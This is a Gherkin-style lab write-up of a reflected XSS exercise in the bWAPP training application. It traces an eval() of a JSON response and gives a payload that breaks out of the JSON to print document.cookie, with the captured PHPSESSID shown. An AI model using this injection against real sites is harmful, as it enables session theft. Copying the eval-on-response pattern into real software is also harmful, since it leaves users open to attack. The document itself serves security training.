# language: en

Feature: XSS Reflected - (AJAX/JSON)
  From the bWAPP system
  Of the category A3: Cross-Site Scripting (XSS)
  With low security level
  As the registered user disassembly

  Background:
    Given I'm running macOS High Sierra 10.13.6 (17G65)
    And using Docker version 17.07.0-ce, build 8784753
    And also using Safari Version 11.1.2 (13605.3.8)
    Given the following scenario
    """
    URN: /xss_ajax_2-1.php
    Message: XSS - Reflected (AJAX/JSON)
    Details:
      - A text field to search a movie by his name
      - Hint that says 'our master really loves Marvel movies :)'
    Objective: Perform an XSS to the web page
    """

  Scenario: Vulnerability discovery
    When I test the regular behavior of the page entering the name 'iron man'
    Then it shows me that they have that movie, so I look out the source code
    """
    ...
    // Retrieves the movie title typed by the user on the form
    // title = document.getElementById("title").value;
    title = encodeURIComponent(document.getElementById("title").value);
    // Executes the 'xss_ajax_1-2.php' page from the server
    xmlHttp.open("GET", "xss_ajax_2-2.php?title=" + title, true);
    ...
    // Extracts the JSON retrieved from the server
    JSONResponse = eval("(" + xmlHttp.responseText + ")");
    ...
    """
    And found that the script evaluate/execute the server response as it comes
    Given I need to know how the response is being returned by the server
    And open 'xss_ajax_2-2.php' which is where the request is made it shows me:
    """
    Try harder :p
    """
    When I make a request with the same movie name
    And another with just 'asd' as the movie title
    """
    http://192.168.0.18/bWAPP/xss_ajax_2-2.php?title=iron%20man
    {"movies":[{"response":"Yes! We have that movie..."}]}
    http://192.168.0.18/bWAPP/xss_ajax_2-2.php?title=asd
    {"movies":[{"response":"asd??? Sorry, we don't have that movie :("}]}
    """
    Then I found it's a JSON endpoint that replies the title when it's unknown

  Scenario: Trick the endpoint to make an XSS
    Given I know the format of the response and how it's being evaluated
    When I make a search with entering the following name as the title
    """
    # Need to close the response title, brackets and display the cookies before
    # making everything else a comment
    Input:  "}]}); alert(document.cookie); //
    Output: top_security_nossl=; top_security=; security_level=1;
            PHPSESSID=66995b8d22c090fa9bbe1af9cbb849a0
    """
    Then it pop up the user cookies, this POC can be escalated to other attacks
